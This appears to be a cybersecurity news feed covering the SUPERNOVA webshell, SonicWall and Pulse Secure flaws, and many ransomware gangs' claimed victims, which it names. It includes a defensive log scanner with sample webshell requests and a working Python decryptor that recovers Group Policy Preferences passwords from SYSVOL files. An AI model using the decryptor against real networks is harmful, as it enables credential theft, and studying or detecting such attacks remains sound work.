Prometei administrators have some of the technical groundwork in place should they want to embrace more "destructive payloads"
https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities
A threat actor connected to the entity's network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials.
SUPERNOVA is a malicious webshell backdoor that lets a remote operator submit C# source code to the web portal, which compiles and runs it on the spot. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.
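A detection the paragraph above invites, as an added example (not CISA's, SolarWinds' or any vendor's code): the trojanised logoimagehandler.ashx read its instructions from the request parameters `clazz`, `method`, `args` and `codes` (the last one carrying the C# source), and the legitimate handler has no use for those names, so their presence in a request to that handler is a strong signal. The IIS W3C log lines, the client addresses and the URL paths below are constructed for the example; the only thing taken from the real malware is the parameter names.

```python
"""Flag SUPERNOVA-style requests in IIS W3C logs.

Added example, not code from the advisory quoted above. The parameter names
come from public analyses of the trojanised logoimagehandler.ashx; the log
lines and paths are constructed.
"""
from urllib.parse import parse_qs

# Query-string parameters the SUPERNOVA handler looked for. The legitimate
# image handler needs none of them, so any one of them is suspicious.
SUPERNOVA_PARAMS = {"clazz", "method", "args", "codes"}


def parse_w3c_line(line: str, fields: list) -> dict:
    """Split one IIS W3C log line into a dict keyed by the #Fields header."""
    values = line.split(" ")
    if len(values) != len(fields):
        return {}
    return dict(zip(fields, values))


def query_params(entry: dict) -> dict:
    """Decode cs-uri-query ('-' means no query string) into {name: [values]}."""
    query = entry.get("cs-uri-query", "-")
    if query == "-":
        return {}
    return {k.lower(): v for k, v in parse_qs(query, keep_blank_values=True).items()}


def is_supernova_request(entry: dict) -> bool:
    """True when a request to logoimagehandler.ashx carries webshell parameters."""
    stem = entry.get("cs-uri-stem", "").lower()
    if not stem.endswith("/logoimagehandler.ashx"):
        return False
    return bool(SUPERNOVA_PARAMS & set(query_params(entry)))


def injected_source(entry: dict) -> str:
    """The C# the operator tried to run, for triage (empty if none was sent)."""
    return query_params(entry).get("codes", [""])[0]


def scan_iis_log(text: str) -> list:
    """Return the log entries (as dicts) that match the SUPERNOVA pattern."""
    fields, hits = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # header names the data lines below
            continue
        if line.startswith("#") or not line.strip():
            continue                       # other directives, blank lines
        entry = parse_w3c_line(line, fields)
        if entry and is_supernova_request(entry):
            hits.append(entry)
    return hits


# Constructed sample log: one normal login, one legitimate logo fetch, and
# two webshell invocations from a second client.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-04-20 10:15:01 10.0.0.5 GET /Orion/Login.aspx - 200
2021-04-20 10:15:09 10.0.0.5 GET /Orion/Images/logoimagehandler.ashx id=1 200
2021-04-20 10:16:44 203.0.113.7 POST /Orion/Images/logoimagehandler.ashx clazz=Backdoor&method=Run&args=whoami&codes=using+System%3B 200
2021-04-20 10:17:02 203.0.113.7 GET /orion/images/LogoImageHandler.ashx codes=%2F%2Fx 500
"""

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-method"],
              "codes=" + repr(injected_source(hit)))
```

The match is deliberately case-insensitive on both the path and the parameter names, since IIS routes `LogoImageHandler.ashx` and `logoimagehandler.ashx` to the same handler; a 500 response is not a reason to drop a hit, because a failed compile is still an attempt.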
The operators of the Astro Team ransomware claim an attack against:
Located in South Beach, Crest Hotel Suites is within a 5-minute walk of popular attractions such as Fillmore Miami Beach and New World Center. This 65-room, 3.5-star hotel has a restaurant along with conveniences like an outdoor pool and free in-room WiFi.
#USA #ASTROTEAM #HOTEL #DATABREACH #TOURISME #RANSOMWARE #ASTRO #TRAVEL #CUSTOMERS #COMPANIES #VOYAGES #BUSINESS #SALES #MARKETS #BRANDS #SERVICES #WORLD
The operators of the Astro Team ransomware claim attacks against:
stonegatesl.com
We provide support services to senior living and care properties that offer skilled health care, assisted living, memory support and independent living at locations in Texas, Oklahoma, and Colorado. Founded and led by a team of senior living industry veterans, StoneGate understands that careful attention to customer expectations is vital to the success of a senior living and care community.
pezzutogroup.it
Since November 2012, Pezzuto Group has become a reference point for Audi and Volkswagen in its region. In 2015 alone, Pezzuto Group climbed into the top 30 Italian Volkswagen dealerships, hitting 100% of its corporate targets every month and averaging around 1,000 new customers a year.
#ITALY #USA #ASTRO #RANSOMWARE #ITALIE #ASTROTEAM #DATABREACH #SERVICES #SUPPORT #SENIOR #HEALTHCARE #INDEPENDENT #TEAM #INDUSTRY #VETERANS #HEALTH #INFORMATION #CUSTOMERS #COMMUNITY #AUTOMOBILE #AUTO #AUTOMOTIVE #COMPANY #CLIENTS #CARS #BUSINESS #CARE #FINANCIAL
"so what exactly is curl?" https://daniel.haxx.se/blog/2021/04/22/so-what-exactly-is-curl/ - I find that explaining curl for mortals is not very easy.
impacket - GPP Passwords
Get-GPPPassword has been added to the examples. It is a Python script that extracts and decrypts Group Policy Preferences passwords; it reads the XML files as SMB streams instead of mounting shares, so it can run inside ordinary Docker containers. It also supports pass-the-hash, pass-the-ticket, pass-the-key and overpass-the-hash, which the Metasploit Framework module does not offer.
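What "decrypting Group Policy Preferences passwords" means in practice, as an added example (this is not impacket's code and not the Get-GPPPassword script itself): every `cpassword` in SYSVOL is AES-256-CBC under the key Microsoft published in MS-GPPREF section 2.2.1.1.4, with an all-zero IV, PKCS#7 padding, UTF-16LE plaintext, and the base64 `=` padding stripped. The example goes slightly beyond the announcement by walking any GPP XML file (Groups.xml, ScheduledTasks.xml, Services.xml, Drives.xml, DataSources.xml), which each store the account under a different attribute. The Groups.xml, the `svc_backup` account and its password are constructed for the example; the `Local*P4ssword!` vector is the widely published gpp-decrypt test value. It needs either the `cryptography` package or pycryptodome.

```python
"""Decrypt Group Policy Preferences cpassword values.

Added example, not impacket's own code. The AES key is the one Microsoft
published in MS-GPPREF 2.2.1.1.4, which is why anyone who can read SYSVOL
can recover every GPP password ever set.
"""
import base64
import xml.etree.ElementTree as ET

GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8"
    "f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)  # MS-GPPREF specifies an all-zero initialisation vector


def _aes_cbc(data: bytes, encrypt: bool) -> bytes:
    """AES-256-CBC with the fixed GPP key and IV, using whichever library exists."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        cipher = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV))
        op = cipher.encryptor() if encrypt else cipher.decryptor()
        return op.update(data) + op.finalize()
    except ImportError:
        from Crypto.Cipher import AES  # pycryptodome fallback
        aes = AES.new(GPP_AES_KEY, AES.MODE_CBC, GPP_IV)
        return aes.encrypt(data) if encrypt else aes.decrypt(data)


def decrypt_cpassword(cpassword: str) -> str:
    """Turn a cpassword attribute value back into the clear-text password."""
    cpassword += "=" * (-len(cpassword) % 4)   # GPP strips base64 padding
    plain = _aes_cbc(base64.b64decode(cpassword), encrypt=False)
    pad = plain[-1] if plain else 0
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword?")
    return plain[:-pad].decode("utf-16-le")


def encrypt_cpassword(password: str) -> str:
    """Inverse operation, used here only to build the constructed sample below."""
    raw = password.encode("utf-16-le")
    pad = 16 - len(raw) % 16
    ciphertext = _aes_cbc(raw + bytes([pad]) * pad, encrypt=True)
    return base64.b64encode(ciphertext).decode().rstrip("=")


def find_gpp_credentials(xml_text: str) -> list:
    """Return (account, password) pairs from any GPP XML file.

    Groups.xml uses userName, ScheduledTasks.xml runAs, Services.xml
    accountName, Drives.xml and DataSources.xml username."""
    found = []
    for el in ET.fromstring(xml_text).iter():
        cp = el.get("cpassword")
        if not cp:
            continue
        account = (el.get("userName") or el.get("runAs")
                   or el.get("accountName") or el.get("username") or "?")
        found.append((account, decrypt_cpassword(cp)))
    return found


# Published gpp-decrypt test vector: decrypts to "Local*P4ssword!".
KNOWN_CPASSWORD = "j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"

# Constructed Groups.xml in the shape GPP writes to SYSVOL\...\Preferences\Groups\.
SAMPLE_GROUPS_XML = f"""<Groups clsid="{{3125E937-EB16-4b4c-9934-544FC6D24D26}}">
  <User clsid="{{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}}" name="svc_backup">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="{encrypt_cpassword('Summer2021!')}"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="svc_backup"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    print("known vector:", decrypt_cpassword(KNOWN_CPASSWORD))
    for account, password in find_gpp_credentials(SAMPLE_GROUPS_XML):
        print(f"{account}: {password}")
```

The padding check matters on real SYSVOL: an attribute that is not a GPP cpassword (or one truncated by a copy-paste) fails it with a clear error rather than decoding to garbage UTF-16.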
Sébastien Larinier has just released Pyeti-python.
Pyeti-python lets you extract data from YETI, such as specific observables (malware, IPs, domains, ...). It can be used to plug in your own tool and enrich your threat-intelligence feed. YETI ("Your Everyday Threat Intelligence") is a platform meant to organize observables, IoCs, TTPs, and knowledge on threats in a single, unified repository.
#INFORMATIQUE #PYTHON #TOOLS #OPENSOURCE #SECURITY #INTELLIGENCE #LINUX #CYBER #THREATS
SBU cyber specialists, together with US law enforcement, have exposed a hacker in the Kherson region
A Ukrainian national has been detained by the SBU (СБ України) as part of an investigation into the theft of several tens of millions of dollars from Canadian and US banks.
Ukraine's SBU State Security Service has detained a Ukrainian hacker who stole tens of millions of US dollars from US and Canadian banks.
Hiscox Cyber Readiness Report 2021
Three zero-days in SonicWall products reported by Mandiant's Josh Fleischer and Chris DiGiamo (CVE-2021-20021, CVE-2021-20022, CVE-2021-20023)
The operators behind the Darkside ransomware claim an attack against:
btu.com
Founded in 1950, the company focuses on thermal processing equipment for alternative energy and electronics, such as semiconductor packaging, solar cell manufacturing, printed circuit board assembly, and nuclear fuel processing.
#USA #RANSOMWARE #DARKSIDE #DATABREACH #INTERNATIONAL #SEMICONDUCTOR #INDUSTRY #EQUIPMENT #SOLUTIONS #ENERGIES #MARKET #ELECTRONICS #CYBER #MANUFACTURE #INDUSTRIAL #SOLAR #ASSEMBLY #TECHNOLOGIES #DESIGN #CAREERS #NUCLEAR #COMPANIES
🇦🇷 Hiram Alejandro Camarillo (seekurity.com) has identified an actor on a Russian forum trying to sell access to the IT systems of the PFA, the Argentine federal police, for 0.033 bitcoin. As proof, the seller published Diego Maradona's record.
Could this be related to this security incident?
Exploitation of Pulse Connect Secure Vulnerabilities (CVE-2021-22893)
The IT and telephone systems of Cegos SA (cegos.fr) have been paralysed since 15 April 2021 following a cyber attack.
https://www.cegos.fr/actualites/news/cegos-a-ete-la-cible-dune-attaque-cyber
The operators behind the Avaddon ransomware claim an attack against:
protectim.fr
Protectim Security Services was the first security company to equip itself with a state-of-the-art command centre that offers a real-time view of all activity deployed across French territory. This centre has an alerting role and allows every team to be supervised with the greatest responsiveness. We put in place security arrangements that create value. The new security context has put our agents on the front line: their profiling skills reassure your clients.
#FRANCE #RANSOMWARE #AVADDON #DATABREACH #SURVEILLANCE #SÉCURITÉ #AGENTS #VIP #SECRETS
The operators behind the Babuk ransomware claim an attack against:
phonehouse.es
As a specialist in telecommunications, Phone House had clearly defined its core product offering and found its niche as a benchmark in the Spanish mobile market for more than 20 years.
"Babuk has downloaded a full dump of your 10 Oracle databases (more than 100 GB), which contains GDPR information of more than 3 million customers and employees."
#SPAIN #BABUK #MOBILE #RANSOMWARE #TELECOM #DATABREACH #ESPAGNE
The operators behind the Marketo ransomware claim attacks against:
newbridgesecurities.com
We provide full-service securities brokerage and investment banking services. Newbridge Securities has over 80 locations in the US, ready to serve your financial needs.
americansignal.com
American Signal Corp., ASC Mass Notification Solutions, has structured our domestic sales into the following regions in order to provide timely and accurate responses to our customers' needs and requests. Military and nuclear power customers have dedicated professionals.
lime-energy.com
Lime Energy offers energy consulting services. Lime has been working with small and medium-sized businesses and our utility clients for more than 25 years. In New York alone, we've provided energy efficiency solutions to 34,245 small businesses in just six years. Our state-of-the-art LED technology can help reduce energy consumption by up to 80 percent.
apmmguntown.com
APMM is one of the leading suppliers in North America for the Toyota Corolla manufactured in Blue Springs, MS.
#USA #RANSOMWARE #MARKETO #DATABREACH #CYBER #THREATS #MILITARY #NUCLEAR #BANKING #AUTOMOTIVE #INDUSTRY #ENERGIES #SERVICES
The operators behind the Babuk ransomware claim an attack against:
mariettondeveloppement.fr
Marietton Développement is the leading independent tourism operator in France. Created in 1968 by the Abitbol family, the group's first travel agency, on rue Marietton in Lyon, has grown into a group of more than 1,650 employees with a nationwide footprint and complementary tourism businesses.
#FRANCE #RANSOMWARE #BABUK #DATABREACH #TOURISME #VOYAGES #INDEPENDENT #INVESTISSEMENTS #WORLD #TRAVEL #NETWORK #GROUP #FINANCIAL #DIGITAL #AGENCE #CYBER #CUSTOMERS #INVESTMENTS #PRODUCTION #INVESTISSEURS #DESTINATIONS #METIERS #AGENCES #CARRIERES #GROUPE #PRESSE #MULTIMARQUES #COMPANIES #DÉVELOPPEMENT #INVESTORS #MARQUES #BUSINESS #SALES #DEVELOPPEMENT #MARKETS #AFFAIRES #ADMINISTRATIONS #BRANDS #ENTREPRISES #CAREERS #PRESTATAIRES #SOLUTIONS #ASSOCIATIONS #ORGANIZATIONS #SERVICES
The operators behind the Babuk ransomware claim an attack against:
mankatoford.net
Ford dealership in Mankato for a variety of new & used cars, parts, auto service, and financing. Mankato Ford is a family-owned dealership committed to providing a great customer experience. We are a full-service dealership with Quick Lane near North Mankato, Nicollet, New Ulm, Eagle Lake MN and Saint Peter MN.
#USA #RANSOMWARE #BABUK #DATABREACH #MANKATO #CARS #AUTOMOTIVE #PREMIUM #INVENTORY #BUSINESS #AUTO #FINANCIAL #EXPERT #TEAM #DEALERSHIP #SALES #FORD #TRUCKS #SUV #SHOP #SEDAN #MODELS #VAN #WAGON #CONVERTIBLE #DRIVING #MONEY #BRANDS #STOCK #INVENTORY #VEHICLES #RELIABILITY #LOANER #MARKET #GENUINE #SERVICES #PRICES #BUDGET #PAYMENT #LICENSE #INCENTIVES #SHOWROOM #CERTIFIED #FEATURED #APPLICATION #CUSTOMERS #SHOPPING #SCHEDULE #ACCESSORIES
The operators behind the Avaddon ransomware claim an attack against:
alizonindustrie.fr
Manufacture and wholesale/B2B sale of supplies and miscellaneous industrial equipment, specialising in industrial purchasing. More than 26,000 product references across three families: adhesive tapes, technical adhesives, and packaging consumables and machines. The companies Accept, Ridec, Leroy, Excel Services, Steelplast, Evolufil, Filiplast, Pool Management and Alliance Services Distribution are part of the ALIZON INDUSTRIE group.
#FRANCE #RANSOMWARE #AVADDON #DATABREACH #SUPPLYCHAIN #INDUSTRY #SERVICES #LOGISTIC #COVID19 #BUSINESS #INDUSTRIE #SUPPORT #APPROVISIONNEMENT #INDUSTRIES #SOLUTIONS #CERTIFICATIONS #COFRAC #INTERTEK #ECOVADIS #MANAGEMENT #SUPPLY #CAREERS #CANDIDATURES #DEVELOPPEMENT
Peek-a-boo! 👻 / Schrödinger 🐈